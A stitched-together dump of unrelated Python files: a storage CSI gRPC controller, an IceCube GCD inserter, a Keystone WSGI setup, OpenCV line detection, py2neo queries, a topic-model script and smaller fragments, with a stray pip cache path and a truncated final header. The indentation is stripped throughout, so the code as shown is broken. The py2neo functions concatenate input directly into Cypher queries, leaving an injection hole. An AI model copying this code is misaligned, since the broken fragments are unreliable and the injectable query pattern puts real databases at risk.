# Launch script, redirect output
subprocess.run(sys.argv, capture_output=True)
# Track progress
# Capture error codes
# Return either
|
import os.path
import time
from concurrent import futures
from argparse import ArgumentParser
import grpc
import yaml
from retry import retry
import controller.array_action.errors as array_errors
import controller.controller_server.config as config
import controller.controller_server.utils as utils
from controller.array_action import messages
from controller.array_action.storage_agent import get_agent, detect_array_type
from controller.common import settings
from controller.common.csi_logger import get_stdout_logger, set_log_level
from controller.common.node_info import NodeIdInfo
from controller.common.utils import set_current_thread_name
from controller.controller_server.errors import ObjectIdError, ValidationException
from controller.controller_server.exception_handler import handle_common_exceptions, handle_exception, \
build_error_response
from controller.controller_server import messages as controller_messages
from controller.csi_general import csi_pb2
from controller.csi_general import csi_pb2_grpc
logger = get_stdout_logger()
class ControllerServicer(csi_pb2_grpc.ControllerServicer):
"""
gRPC server for Digestor Service
"""
def __init__(self, array_endpoint):
self.endpoint = array_endpoint
my_path = os.path.abspath(os.path.dirname(__file__))
path = os.path.join(my_path, "../../common/config.yaml")
with open(path, 'r') as yamlfile:
self.cfg = yaml.safe_load(yamlfile) # TODO: add the following when possible : Loader=yaml.FullLoader)
@handle_common_exceptions(csi_pb2.CreateVolumeResponse)
def CreateVolume(self, request, context):
set_current_thread_name(request.name)
logger.info("create volume")
try:
utils.validate_create_volume_request(request)
except ObjectIdError as ex:
return handle_exception(ex, context, grpc.StatusCode.NOT_FOUND,
csi_pb2.CreateVolumeResponse)
logger.debug("volume name : {}".format(request.name))
source_type, source_id = self._get_source_type_and_id(request)
logger.debug("Source {0} id : {1}".format(source_type, source_id))
topologies = utils.get_volume_topologies(request)
secrets = request.secrets
try:
array_connection_info = utils.get_array_connection_info_from_secrets(
secrets=secrets,
topologies=topologies)
volume_parameters = utils.get_volume_parameters(parameters=request.parameters,
system_id=array_connection_info.system_id)
pool = volume_parameters.pool
if not pool:
raise ValidationException(controller_messages.pool_should_not_be_empty_message)
space_efficiency = volume_parameters.space_efficiency
# TODO : pass multiple array addresses
array_type = detect_array_type(array_connection_info.array_addresses)
with get_agent(array_connection_info, array_type).get_mediator() as array_mediator:
logger.debug(array_mediator)
volume_final_name = self._get_volume_final_name(volume_parameters, request.name, array_mediator)
required_bytes = request.capacity_range.required_bytes
max_size = array_mediator.maximal_volume_size_in_bytes
min_size = array_mediator.minimal_volume_size_in_bytes
if required_bytes > max_size:
message = messages.SizeOutOfRangeError_message.format(required_bytes, max_size)
return build_error_response(message, context, grpc.StatusCode.OUT_OF_RANGE,
csi_pb2.CreateVolumeResponse)
if required_bytes == 0:
required_bytes = min_size
logger.debug("requested size is 0 so the default size will be used : {0} ".format(
required_bytes))
try:
volume = array_mediator.get_volume(
volume_final_name,
pool=pool,
)
except array_errors.ObjectNotFoundError:
logger.debug(
"volume was not found. creating a new volume with parameters: {0}".format(request.parameters))
array_mediator.validate_supported_space_efficiency(space_efficiency)
volume = array_mediator.create_volume(volume_final_name, required_bytes, space_efficiency,
pool)
else:
logger.debug("volume found : {}".format(volume))
if not source_id and volume.capacity_bytes != request.capacity_range.required_bytes:
message = "Volume was already created with different size."
return build_error_response(message, context, grpc.StatusCode.ALREADY_EXISTS,
csi_pb2.CreateVolumeResponse)
copy_source_res = self._handle_existing_volume_source(volume, source_id, source_type,
array_connection_info.system_id,
context)
if copy_source_res:
return copy_source_res
if source_id:
self._copy_to_existing_volume_from_source(volume, source_id,
source_type, required_bytes,
array_mediator)
volume.copy_source_id = source_id
res = utils.generate_csi_create_volume_response(volume, array_connection_info.system_id, source_type)
logger.info("finished create volume")
return res
except array_errors.InvalidArgumentError as ex:
return handle_exception(ex, context, grpc.StatusCode.INVALID_ARGUMENT, csi_pb2.CreateVolumeResponse)
except array_errors.VolumeAlreadyExists as ex:
return handle_exception(ex, context, grpc.StatusCode.ALREADY_EXISTS, csi_pb2.CreateVolumeResponse)
def _copy_to_existing_volume_from_source(self, volume, source_id, source_type,
minimum_volume_size, array_mediator):
volume_id = volume.id
try:
source_object = array_mediator.get_object_by_id(source_id, source_type)
if not source_object:
self._rollback_create_volume_from_source(array_mediator, volume.id)
raise array_errors.ObjectNotFoundError(source_id)
source_capacity = source_object.capacity_bytes
logger.debug("Copy {0} {1} data to volume {2}.".format(source_type, source_id, volume_id))
array_mediator.copy_to_existing_volume_from_source(volume_id, source_id,
source_capacity, minimum_volume_size)
logger.debug("Copy volume from {0} finished".format(source_type))
except array_errors.ObjectNotFoundError as ex:
logger.error("Volume not found while copying {0} data to volume".format(source_type))
logger.exception(ex)
self._rollback_create_volume_from_source(array_mediator, volume.id)
raise ex
except Exception as ex:
logger.error("Exception raised while copying {0} data to volume".format(source_type))
self._rollback_create_volume_from_source(array_mediator, volume.id)
raise ex
@retry(Exception, tries=5, delay=1)
def _rollback_create_volume_from_source(self, array_mediator, volume_id):
logger.debug("Rollback copy volume from source. Deleting volume {0}".format(volume_id))
array_mediator.delete_volume(volume_id)
def _handle_existing_volume_source(self, volume, source_id, source_type, system_id, context):
"""
Args:
volume : volume fetched or created in CreateVolume
source_id : id of object we should copy to volume or None if volume should not be copied
source_type: : the object type of the source - volume or snapshot
context : CreateVolume response context
Returns:
If volume exists and is a copy of specified object - set context status to OK
and return CreateVolumeResponse.
If volume is a copy of another source - set context status to INTERNAL and return CreateVolumeResponse.
In any other case return None.
"""
volume_name = volume.name
volume_copy_source_id = volume.copy_source_id
if not source_id and not volume_copy_source_id:
return None
if volume_copy_source_id == source_id:
return self._handle_volume_exists_with_same_source(context, source_id, source_type, volume_name, volume,
system_id)
return self._handle_volume_exists_with_different_source(context, source_id, source_type, volume_name)
def _handle_volume_exists_with_same_source(self, context, source_id, source_type, volume_name, volume, system_id):
logger.debug(
"Volume {0} exists and it is a copy of {1} {2}.".format(volume_name, source_type, source_id))
context.set_code(grpc.StatusCode.OK)
return utils.generate_csi_create_volume_response(volume, system_id, source_type)
def _handle_volume_exists_with_different_source(self, context, source_id, source_type, volume_name):
logger.debug(
"Volume {0} exists but it is not a copy of {1} {2}.".format(volume_name, source_type, source_id))
message = "Volume already exists but it was created from a different source."
return build_error_response(message, context, grpc.StatusCode.ALREADY_EXISTS, csi_pb2.CreateVolumeResponse)
@handle_common_exceptions(csi_pb2.DeleteVolumeResponse)
def DeleteVolume(self, request, context):
set_current_thread_name(request.volume_id)
logger.info("DeleteVolume")
secrets = request.secrets
utils.validate_delete_volume_request(request)
try:
volume_id_info = utils.get_volume_id_info(request.volume_id)
except ObjectIdError as ex:
logger.warning("volume id is invalid. error : {}".format(ex))
return csi_pb2.DeleteVolumeResponse()
system_id = volume_id_info.system_id
array_type = volume_id_info.array_type
volume_id = volume_id_info.object_id
array_connection_info = utils.get_array_connection_info_from_secrets(secrets, system_id=system_id)
with get_agent(array_connection_info, array_type).get_mediator() as array_mediator:
logger.debug(array_mediator)
try:
logger.debug("Deleting volume {0}".format(volume_id))
array_mediator.delete_volume(volume_id)
except array_errors.ObjectNotFoundError as ex:
logger.debug("volume was not found during deletion: {0}".format(ex))
except array_errors.PermissionDeniedError as ex:
return handle_exception(ex, context, grpc.StatusCode.PERMISSION_DENIED,
csi_pb2.DeleteVolumeResponse)
logger.debug("generating delete volume response")
res = csi_pb2.DeleteVolumeResponse()
logger.info("finished DeleteVolume")
return res
@handle_common_exceptions(csi_pb2.ControllerPublishVolumeResponse)
def ControllerPublishVolume(self, request, context):
set_current_thread_name(request.volume_id)
logger.info("ControllerPublishVolume")
utils.validate_publish_volume_request(request)
try:
volume_id_info = utils.get_volume_id_info(request.volume_id)
system_id = volume_id_info.system_id
array_type = volume_id_info.array_type
volume_id = volume_id_info.object_id
node_id_info = NodeIdInfo(request.node_id)
node_name = node_id_info.node_name
initiators = node_id_info.initiators
logger.debug("node name for this publish operation is : {0}".format(node_name))
array_connection_info = utils.get_array_connection_info_from_secrets(request.secrets, system_id=system_id)
with get_agent(array_connection_info, array_type).get_mediator() as array_mediator:
lun, connectivity_type, array_initiators = array_mediator.map_volume_by_initiators(volume_id,
initiators)
logger.info("finished ControllerPublishVolume")
res = utils.generate_csi_publish_volume_response(lun,
connectivity_type,
self.cfg,
array_initiators)
return res
except array_errors.VolumeMappedToMultipleHostsError as ex:
return handle_exception(ex, context, grpc.StatusCode.FAILED_PRECONDITION,
csi_pb2.ControllerPublishVolumeResponse)
except (array_errors.LunAlreadyInUseError, array_errors.NoAvailableLunError) as ex:
return handle_exception(ex, context, grpc.StatusCode.RESOURCE_EXHAUSTED,
csi_pb2.ControllerPublishVolumeResponse)
except (array_errors.NoIscsiTargetsFoundError, ObjectIdError) as ex:
return handle_exception(ex, context, grpc.StatusCode.NOT_FOUND, csi_pb2.ControllerPublishVolumeResponse)
except array_errors.UnsupportedConnectivityTypeError as ex:
return handle_exception(ex, context, grpc.StatusCode.INVALID_ARGUMENT,
csi_pb2.ControllerPublishVolumeResponse)
@handle_common_exceptions(csi_pb2.ControllerUnpublishVolumeResponse)
def ControllerUnpublishVolume(self, request, context):
set_current_thread_name(request.volume_id)
logger.info("ControllerUnpublishVolume")
utils.validate_unpublish_volume_request(request)
try:
volume_id_info = utils.get_volume_id_info(request.volume_id)
system_id = volume_id_info.system_id
array_type = volume_id_info.array_type
volume_id = volume_id_info.object_id
node_id_info = NodeIdInfo(request.node_id)
node_name = node_id_info.node_name
initiators = node_id_info.initiators
logger.debug("node name for this unpublish operation is : {0}".format(node_name))
array_connection_info = utils.get_array_connection_info_from_secrets(request.secrets,
system_id=system_id)
with get_agent(array_connection_info, array_type).get_mediator() as array_mediator:
array_mediator.unmap_volume_by_initiators(volume_id, initiators)
logger.info("finished ControllerUnpublishVolume")
return csi_pb2.ControllerUnpublishVolumeResponse()
except ObjectIdError as ex:
return handle_exception(ex, context, grpc.StatusCode.INVALID_ARGUMENT,
array_errors.VolumeAlreadyUnmappedError)
except array_errors.VolumeAlreadyUnmappedError:
logger.debug("Idempotent case. volume is already unmapped.")
return csi_pb2.ControllerUnpublishVolumeResponse()
except array_errors.ObjectNotFoundError:
logger.debug("Idempotent case. volume is already deleted.")
return csi_pb2.ControllerUnpublishVolumeResponse()
@handle_common_exceptions(csi_pb2.ValidateVolumeCapabilitiesResponse)
def ValidateVolumeCapabilities(self, request, context):
logger.info("ValidateVolumeCapabilities")
raise NotImplementedError()
@handle_common_exceptions(csi_pb2.ListVolumesResponse)
def ListVolumes(self, request, context):
logger.info("ListVolumes")
raise NotImplementedError()
@handle_common_exceptions(csi_pb2.CreateSnapshotResponse)
def CreateSnapshot(self, request, context):
set_current_thread_name(request.name)
logger.info("Create snapshot")
utils.validate_create_snapshot_request(request)
source_volume_id = request.source_volume_id
logger.info("Snapshot base name : {}. Source volume id : {}".format(request.name, source_volume_id))
secrets = request.secrets
try:
volume_id_info = utils.get_volume_id_info(source_volume_id)
system_id = volume_id_info.system_id
array_type = volume_id_info.array_type
volume_id = volume_id_info.object_id
array_connection_info = utils.get_array_connection_info_from_secrets(secrets, system_id=system_id)
snapshot_parameters = utils.get_snapshot_parameters(parameters=request.parameters,
system_id=array_connection_info.system_id)
pool = snapshot_parameters.pool
with get_agent(array_connection_info, array_type).get_mediator() as array_mediator:
logger.debug(array_mediator)
snapshot_final_name = self._get_snapshot_final_name(snapshot_parameters, request.name, array_mediator)
logger.info("Snapshot name : {}. Volume id : {}".format(snapshot_final_name, volume_id))
snapshot = array_mediator.get_snapshot(
volume_id,
snapshot_final_name,
pool=pool
)
if snapshot:
if snapshot.source_volume_id != volume_id:
message = messages.SnapshotWrongVolumeError_message.format(snapshot_final_name,
snapshot.source_volume_id,
volume_id)
return build_error_response(message, context, grpc.StatusCode.ALREADY_EXISTS,
csi_pb2.CreateSnapshotResponse)
else:
logger.debug(
"Snapshot doesn't exist. Creating a new snapshot {0} from volume {1}".format(
snapshot_final_name,
volume_id))
snapshot = array_mediator.create_snapshot(volume_id, snapshot_final_name, pool)
logger.debug("generating create snapshot response")
res = utils.generate_csi_create_snapshot_response(snapshot, source_volume_id)
logger.info("finished create snapshot")
return res
except (ObjectIdError, array_errors.SnapshotSourcePoolMismatch) as ex:
return handle_exception(ex, context, grpc.StatusCode.INVALID_ARGUMENT,
csi_pb2.CreateSnapshotResponse)
except array_errors.SnapshotAlreadyExists as ex:
return handle_exception(ex, context, grpc.StatusCode.ALREADY_EXISTS,
csi_pb2.CreateSnapshotResponse)
@handle_common_exceptions(csi_pb2.DeleteSnapshotResponse)
def DeleteSnapshot(self, request, context):
set_current_thread_name(request.snapshot_id)
logger.info("Delete snapshot")
secrets = request.secrets
utils.validate_delete_snapshot_request(request)
try:
try:
snapshot_id_info = utils.get_snapshot_id_info(request.snapshot_id)
except ObjectIdError as ex:
logger.warning("Snapshot id is invalid. error : {}".format(ex))
return csi_pb2.DeleteSnapshotResponse()
system_id = snapshot_id_info.system_id
array_type = snapshot_id_info.array_type
snapshot_id = snapshot_id_info.object_id
array_connection_info = utils.get_array_connection_info_from_secrets(secrets, system_id=system_id)
with get_agent(array_connection_info, array_type).get_mediator() as array_mediator:
logger.debug(array_mediator)
try:
array_mediator.delete_snapshot(snapshot_id)
except array_errors.ObjectNotFoundError as ex:
logger.debug("Snapshot was not found during deletion: {0}".format(ex))
except array_errors.ObjectNotFoundError as ex:
logger.debug("snapshot was not found during deletion: {0}".format(ex.message))
context.set_code(grpc.StatusCode.OK)
return csi_pb2.DeleteSnapshotResponse()
logger.debug("generating delete snapshot response")
res = csi_pb2.DeleteSnapshotResponse()
logger.info("finished DeleteSnapshot")
return res
@handle_common_exceptions(csi_pb2.GetCapacityResponse)
def GetCapacity(self, request, context):
logger.info("GetCapacity")
raise NotImplementedError()
@handle_common_exceptions(csi_pb2.ControllerExpandVolumeResponse)
def ControllerExpandVolume(self, request, context):
set_current_thread_name(request.volume_id)
logger.info("ControllerExpandVolume")
secrets = request.secrets
utils.validate_expand_volume_request(request)
try:
volume_id_info = utils.get_volume_id_info(request.volume_id)
except ObjectIdError as ex:
return handle_exception(ex, context, grpc.StatusCode.INVALID_ARGUMENT,
csi_pb2.ControllerExpandVolumeResponse)
try:
system_id = volume_id_info.system_id
array_type = volume_id_info.array_type
volume_id = volume_id_info.object_id
array_connection_info = utils.get_array_connection_info_from_secrets(secrets, system_id=system_id)
with get_agent(array_connection_info, array_type).get_mediator() as array_mediator:
logger.debug(array_mediator)
required_bytes = request.capacity_range.required_bytes
max_size = array_mediator.maximal_volume_size_in_bytes
volume_before_expand = array_mediator.get_object_by_id(volume_id, config.VOLUME_TYPE_NAME)
if not volume_before_expand:
raise array_errors.ObjectNotFoundError(volume_id)
if volume_before_expand.capacity_bytes >= required_bytes:
context.set_code(grpc.StatusCode.OK)
return utils.generate_csi_expand_volume_response(volume_before_expand.capacity_bytes,
node_expansion_required=False)
if required_bytes > max_size:
message = messages.SizeOutOfRangeError_message.format(required_bytes, max_size)
return build_error_response(message, context, grpc.StatusCode.OUT_OF_RANGE,
csi_pb2.ControllerExpandVolumeResponse)
logger.debug("expanding volume {0}".format(volume_id))
array_mediator.expand_volume(
volume_id=volume_id,
required_bytes=required_bytes)
volume_after_expand = array_mediator.get_object_by_id(volume_id, config.VOLUME_TYPE_NAME)
if not volume_after_expand:
raise array_errors.ObjectNotFoundError(volume_id)
res = utils.generate_csi_expand_volume_response(volume_after_expand.capacity_bytes)
logger.info("finished expanding volume")
return res
except array_errors.NotEnoughSpaceInPool as ex:
return handle_exception(ex, context, grpc.StatusCode.RESOURCE_EXHAUSTED,
csi_pb2.ControllerExpandVolumeResponse)
def ControllerGetCapabilities(self, request, context):
logger.info("ControllerGetCapabilities")
types = csi_pb2.ControllerServiceCapability.RPC.Type
res = csi_pb2.ControllerGetCapabilitiesResponse(
capabilities=[csi_pb2.ControllerServiceCapability(
rpc=csi_pb2.ControllerServiceCapability.RPC(type=types.Value("CREATE_DELETE_VOLUME"))),
csi_pb2.ControllerServiceCapability(
rpc=csi_pb2.ControllerServiceCapability.RPC(type=types.Value("CREATE_DELETE_SNAPSHOT"))),
csi_pb2.ControllerServiceCapability(
rpc=csi_pb2.ControllerServiceCapability.RPC(type=types.Value("PUBLISH_UNPUBLISH_VOLUME"))),
csi_pb2.ControllerServiceCapability(
rpc=csi_pb2.ControllerServiceCapability.RPC(type=types.Value("CLONE_VOLUME"))),
csi_pb2.ControllerServiceCapability(
rpc=csi_pb2.ControllerServiceCapability.RPC(type=types.Value("EXPAND_VOLUME")))])
logger.info("finished ControllerGetCapabilities")
return res
def __get_identity_config(self, attribute_name):
return self.cfg['identity'][attribute_name]
@handle_common_exceptions(csi_pb2.GetPluginInfoResponse)
def GetPluginInfo(self, _, context):
logger.info("GetPluginInfo")
name = self.__get_identity_config("name")
version = self.__get_identity_config("version")
if not name or not version:
message = "plugin name or version cannot be empty"
return build_error_response(message, context, grpc.StatusCode.INTERNAL, csi_pb2.GetPluginInfoResponse)
logger.info("finished GetPluginInfo")
return csi_pb2.GetPluginInfoResponse(name=name, vendor_version=version)
def _get_volume_final_name(self, volume_parameters, name, array_mediator):
return self._get_object_final_name(volume_parameters, name, array_mediator,
config.VOLUME_TYPE_NAME)
def _get_snapshot_final_name(self, volume_parameters, name, array_mediator):
name = self._get_object_final_name(volume_parameters, name, array_mediator,
config.SNAPSHOT_TYPE_NAME)
return name
def _get_object_final_name(self, volume_parameters, name, array_mediator, object_type):
prefix = ""
if volume_parameters.prefix:
prefix = volume_parameters.prefix
if len(prefix) > array_mediator.max_object_prefix_length:
raise array_errors.IllegalObjectName(
"The {} name prefix '{}' is too long, max allowed length is {}".format(
object_type,
prefix,
array_mediator.max_object_prefix_length
)
)
if not prefix:
prefix = array_mediator.default_object_prefix
full_name = self._join_object_prefix_with_name(prefix, name)
if len(full_name) > array_mediator.max_object_name_length:
hashed_name = utils.hash_string(name)
full_name = self._join_object_prefix_with_name(prefix, hashed_name)
return full_name[:array_mediator.max_object_name_length]
def _join_object_prefix_with_name(self, prefix, name):
if prefix:
return settings.NAME_PREFIX_SEPARATOR.join((prefix, name))
return name
def GetPluginCapabilities(self, _, __):
logger.info("GetPluginCapabilities")
service_type = csi_pb2.PluginCapability.Service.Type
volume_expansion_type = csi_pb2.PluginCapability.VolumeExpansion.Type
capabilities = self.__get_identity_config("capabilities")
capability_list = []
service_capabilities = capabilities.get('Service')
volume_expansion_capability = capabilities.get('VolumeExpansion')
if service_capabilities:
for service_capability in service_capabilities:
capability_list.append(
csi_pb2.PluginCapability(
service=csi_pb2.PluginCapability.Service(type=service_type.Value(service_capability))))
if volume_expansion_capability:
capability_list.append(
csi_pb2.PluginCapability(
volume_expansion=csi_pb2.PluginCapability.VolumeExpansion(
type=volume_expansion_type.Value(volume_expansion_capability))))
logger.info("finished GetPluginCapabilities")
return csi_pb2.GetPluginCapabilitiesResponse(
capabilities=capability_list
)
def Probe(self, _, context):
context.set_code(grpc.StatusCode.OK)
return csi_pb2.ProbeResponse()
def start_server(self):
controller_server = grpc.server(futures.ThreadPoolExecutor(max_workers=settings.CSI_CONTROLLER_SERVER_WORKERS))
csi_pb2_grpc.add_ControllerServicer_to_server(self, controller_server)
csi_pb2_grpc.add_IdentityServicer_to_server(self, controller_server)
# bind the server to the port defined above
# controller_server.add_insecure_port('[::]:{}'.format(self.server_port))
# controller_server.add_insecure_port('unix://{}'.format(self.server_port))
controller_server.add_insecure_port(self.endpoint)
logger.info("Controller version: {}".format(self.__get_identity_config("version")))
# start the server
logger.debug("Listening for connections on endpoint address: {}".format(self.endpoint))
controller_server.start()
logger.debug('Controller Server running ...')
try:
while True:
time.sleep(60 * 60 * 60)
except KeyboardInterrupt:
controller_server.stop(0)
logger.debug('Controller Server Stopped ...')
def _get_source_type_and_id(self, request):
source = request.volume_content_source
object_id = None
source_type = None
if source:
logger.info(source)
if source.HasField(config.SNAPSHOT_TYPE_NAME):
source_id = source.snapshot.snapshot_id
source_type = config.SNAPSHOT_TYPE_NAME
elif source.HasField(config.VOLUME_TYPE_NAME):
source_id = source.volume.volume_id
source_type = config.VOLUME_TYPE_NAME
else:
return None, None
object_id_info = utils.get_object_id_info(source_id, source_type)
object_id = object_id_info.object_id
return source_type, object_id
def main():
parser = ArgumentParser()
parser.add_argument("-e", "--csi-endpoint", dest="endpoint", help="grpc endpoint")
parser.add_argument("-l", "--loglevel", dest="loglevel", help="log level")
arguments = parser.parse_args()
set_log_level(arguments.loglevel)
controller_servicer = ControllerServicer(arguments.endpoint)
controller_servicer.start_server()
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
"""
author: mzoll <marcel.zoll@fysik.su.se>
please report any errors and possible improvements to the author
"""
import os, numpy, glob
from icecube import icetray, dataclasses, dataio
from icecube.phys_services import goodrunlist
class GCD_inserter(icetray.I3PacketModule):
"""
inserts the GCD-frames before each event that is seen.
gets the GCD-files from the goodrunlist-info.
NOTE: can only be used for experimental data (use the 'If'-option in the tray)
"""
def __init__(self,context):
super(GCD_inserter, self).__init__(context, icetray.I3Frame.DAQ)
self.ignoreTypeList = []
self.AddParameter("IgnoreFrameTypes",
"Ignore this list of frametypes from the read GCD file",
self.ignoreTypeList)
self.AddParameter("Pass2",
"Use pass2 good run list?",
False)
self.AddOutBox("OutBox")
def Configure(self):
super(GCD_inserter, self).Configure()
self.ignoreTypeList = self.GetParameter("IgnoreFrameTypes")
self.pass2 = self.GetParameter("Pass2")
self.last_seen_run = float('nan')
self.GRL = goodrunlist.GRL(pass2 = self.pass2)
def FramePacket(self, frames):
eh = frames[0]["I3EventHeader"]
if eh.run_id <= 99999:
icetray.logging.log_fatal("Events seem not to be experimental data (run_id <= 99999)")
if self.last_seen_run==eh.run_id:
for frame in frames:
self.PushFrame(frame)
return
icetray.logging.log_info("Event with a new run_id encountered: %d; pushing in GCD-frames!"%(eh.run_id))
if eh.run_id not in self.GRL:
icetray.logging.log_fatal("Goodrun-lists do not contain an entry for this run (%d); cannot infer GCD-file path"%(eh.run_id))
#clip in the gcd-file content
gcd_file = dataio.I3File(self.GRL[eh.run_id].get_gcd_file())
while (gcd_file.more()):
gcd_frame = gcd_file.pop_frame()
if gcd_frame.Stop not in self.ignoreTypeList:
self.PushFrame(gcd_frame)
self.last_seen_run = eh.run_id
#push all other frames
for frame in frames:
self.PushFrame(frame)
return
|
import socket
import numpy
try:
import cPickle as pickle
except ImportError:
import pickle
sock = socket.socket()
data= numpy.ones((1, 60))
sock.connect(('localhost',5555))
serialized_data = pickle.dumps(data, protocol=2)
sock.sendall(serialized_data)
sock.close()
sock = socket.socket()
data= numpy.zeros((1, 60))
sock.connect(('localhost',8000))
serialized_data = pickle.dumps(data, protocol=2)
sock.sendall(serialized_data)
sock.close()
|
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import oslo_i18n
from oslo_log import log
# NOTE(dstanek): i18n.enable_lazy() must be called before
# keystone.i18n._() is called to ensure it has the desired lazy lookup
# behavior. This includes cases, like keystone.exceptions, where
# keystone.i18n._() is called at import time.
oslo_i18n.enable_lazy()
from keystone.common import profiler
import keystone.conf
from keystone import exception
from keystone.server import common
from keystone.version import service as keystone_service
CONF = keystone.conf.CONF
def initialize_application(name,
post_log_configured_function=lambda: None,
config_files=None):
possible_topdir = os.path.normpath(os.path.join(
os.path.abspath(__file__),
os.pardir,
os.pardir,
os.pardir))
dev_conf = os.path.join(possible_topdir,
'etc',
'keystone.conf')
if not config_files:
config_files = None
if os.path.exists(dev_conf):
config_files = [dev_conf]
common.configure(config_files=config_files)
# Log the options used when starting if we're in debug mode...
if CONF.debug:
CONF.log_opt_values(log.getLogger(CONF.prog), log.DEBUG)
post_log_configured_function()
def loadapp():
return keystone_service.loadapp(
'config:%s' % find_paste_config(), name)
_unused, application = common.setup_backends(
startup_application_fn=loadapp)
# setup OSprofiler notifier and enable the profiling if that is configured
# in Keystone configuration file.
profiler.setup(name)
return application
def find_paste_config():
"""Find Keystone's paste.deploy configuration file.
Keystone's paste.deploy configuration file is specified in the
``[paste_deploy]`` section of the main Keystone configuration file,
``keystone.conf``.
For example::
[paste_deploy]
config_file = keystone-paste.ini
:returns: The selected configuration filename
:raises: exception.ConfigFileNotFound
"""
if CONF.paste_deploy.config_file:
paste_config = CONF.paste_deploy.config_file
paste_config_value = paste_config
if not os.path.isabs(paste_config):
paste_config = CONF.find_file(paste_config)
elif CONF.config_file:
paste_config = CONF.config_file[0]
paste_config_value = paste_config
else:
# this provides backwards compatibility for keystone.conf files that
# still have the entire paste configuration included, rather than just
# a [paste_deploy] configuration section referring to an external file
paste_config = CONF.find_file('keystone.conf')
paste_config_value = 'keystone.conf'
if not paste_config or not os.path.exists(paste_config):
raise exception.ConfigFileNotFound(config_file=paste_config_value)
return paste_config
def _get_config_files(env=None):
if env is None:
env = os.environ
dirname = env.get('OS_KEYSTONE_CONFIG_DIR', '').strip()
files = [s.strip() for s in
env.get('OS_KEYSTONE_CONFIG_FILES', '').split(';') if s.strip()]
if dirname:
if not files:
files = ['keystone.conf']
files = [os.path.join(dirname, fname) for fname in files]
return files
def initialize_admin_application():
return initialize_application(name='admin',
config_files=_get_config_files())
def initialize_public_application():
return initialize_application(name='main',
config_files=_get_config_files())
|
/home/runner/.cache/pip/pool/d0/a5/47/6c47b3351e4445146ec52e7eaa10e0d8e240aed1c5c71bfb253a8515c3 |
import asyncio
import time
from aio_counter import AioCounter
async def with_ttl(loop):
counter = AioCounter(max_count=10, start_count=2, ttl=1, loop=loop)
print(counter.count)
print(time.monotonic())
for _ in range(100):
await counter.inc(value=1)
print(time.monotonic())
async def without_ttl(loop):
counter = AioCounter(max_count=10, start_count=2, ttl=None, loop=loop)
# try increment counter or wait
await counter.inc(value=1)
# try increment counter or raise exception
counter.inc_nowait(value=1)
# try decrement counter or raise exception
counter.dec_nowait(value=1)
# try decrement counter or wait
await counter.dec(value=1)
async def main(loop):
await with_ttl(loop)
await without_ttl(loop)
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(main(loop))
|
import numpy as np
import cv2 as cv
import sys
from threshold import threshold
from showPic import showImg
def printDilationLines(name):
img_sh = threshold(name + ".png")
im2 = cv.dilate(img_sh, np.ones((15, 15), np.uint8), 1)
lines = cv.HoughLinesP(im2-img_sh, 1, np.pi/180, 100, minLineLength=150, maxLineGap=10)
flat = []
for line in lines:
x1, y1, x2, y2 = line[0]
if getAbsTan(x1, y1, x2, y2) < 0.4:
flat.append(line)
print(str(len(flat))+" horizotal lines are found!")
img = cv.imread(name + ".png")
for line in flat:
x1, y1, x2, y2 = line[0]
cv.line(img, (x1, y1), (x2, y2), (0, 0, 255), 20)
cv.imwrite(name+"_out.png", img)
def getAbsTan(x1, y1, x2, y2):
tan = (y2 - y1) / (x2 - x1)
if tan >= 0:
return tan
else:
return -tan
for i in range(0, 8):
print("img-00"+str(i))
printDilationLines("img-00"+str(i))
|
from py2neo import Graph, Node, Relationship
g = Graph('bolt://localhost:7687')
def get_company_all():
df = g.run(
"MATCH (a :company) RETURN a.company_id as company_id, a.name as name, a.industry as industry LIMIT 4").data()
print("\n\nDF = {}s".format(df))
return df
def get_company_name(criteria):
df = g.run(
"MATCH (a :company) where a.name = '" + criteria + "' RETURN a.company_id as company_id, a.name as name, a.industry as industry LIMIT 4").data()
print("\n\nDF = {}s".format(df))
return df
def get_company_industry(criteria):
df = g.run(
"MATCH (a :company) where a.industry = '" + criteria + "' RETURN a.company_id as company_id, a.name as name, a.industry as industry LIMIT 4").data()
print("\n\nDF = {}s".format(df))
return df
get_company_all()
|
from docopt import docopt
from collections import OrderedDict
def get_topic_keys(f,examples=10):
topics2keys = {}
with open(f, "r") as topics:
for topic in topics:
topic = topic.split()
_id = int(topic[0])
keys = topic[2:examples+2]
topics2keys[_id] = keys
return topics2keys
def get_doc_topics(f):
albums = 0
books = 0
topics2type = OrderedDict()
with open(f, "r") as docs:
for doc in docs:
doc = doc.split()
_id = doc[0]
name = doc[1].split("/")[-1:][0].replace(".html.txt","")
_type = "album" if name.startswith("TYPE_ALBUM") else "book"
if _type == "album":
name = name.replace("TYPE_ALBUM","")
albums += 1
else:
books += 1
name = name.replace("TYPE_BOOK","")
topics = doc[2:]
for topic, value in enumerate(topics):
if not topic in topics2type:
topics2type[topic] = {"album":0, "book":0}
topics2type[topic][_type] += float(value)
#normalize entries
for topic in topics2type:
topics2type[topic]["album"] /= albums
topics2type[topic]["book"] /= books
return topics2type
def main():
args = docopt("""
Usage:
xxx.py [options] <doc-topics> <topic-keys>
Options:
--minimum NUM Minimum probability for both book and album to show [default: 0.01]
--examples NUM Number of exmaple words to show [default: 10]
""")
topics2type = get_doc_topics(args["<doc-topics>"])
topics2keys = get_topic_keys(args["<topic-keys>"], int(args["--examples"]))
minimum = float(args["--minimum"])
print("high in both")
for topic in topics2type:
if topics2type[topic]["album"] >= minimum and topics2type[topic]["book"] >= minimum:
print(topic,"album:",topics2type[topic]["album"],"book:",topics2type[topic]["book"]," ".join(topics2keys[topic]))
top = []
for topic in topics2type:
top.append((topics2type[topic]["book"], topics2type[topic]["album"], str(topic)+" "+" ".join(topics2keys[topic])))
print("top book")
for x in sorted(top, key=lambda y: y[0], reverse=True)[:10]:
print(x[2])
print("top metal")
for x in sorted(top, key=lambda y: y[1], reverse=True)[:10]:
print(x[2])
if __name__ == '__main__':
main() |
#!/usr/bin/python3
#
# Copyright (c) 2019 Foundries.io
# SPDX-License-Identifier: Apache-2.0
#
import argparse
import logging
import json
import os
import subprocess
import urllib.request
